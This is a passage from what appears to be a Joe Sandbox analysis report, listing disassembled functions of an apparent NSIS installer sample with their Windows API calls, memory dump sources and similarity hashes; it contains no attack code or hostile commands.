                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                              • String ID: 9
                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                              • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
                                                                                                                                              • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                              • lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                              • lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                              • SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                              • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                              • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                              • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,000377E3), ref: 0040304C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%
                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                              • Opcode ID: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                              • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                              • Opcode Fuzzy Hash: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                              • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                              • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                              • wsprintfW.USER32 ref: 0040300A
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                              • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                              • Opcode ID: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                              • Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
                                                                                                                                              • Opcode Fuzzy Hash: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                              • Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                              • wsprintfW.USER32 ref: 00404F78
                                                                                                                                              • SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$H'D
                                                                                                                                              • API String ID: 3540041739-2781796796
                                                                                                                                              • Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
                                                                                                                                              • Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
                                                                                                                                              APIs
                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                              • CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                              • CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                              • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                                                                                                              • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                                                                                                              APIs
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                              • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                              • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                              • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                              • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
                                                                                                                                              • Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                              • Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401E76
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                              • Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
                                                                                                                                              • Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
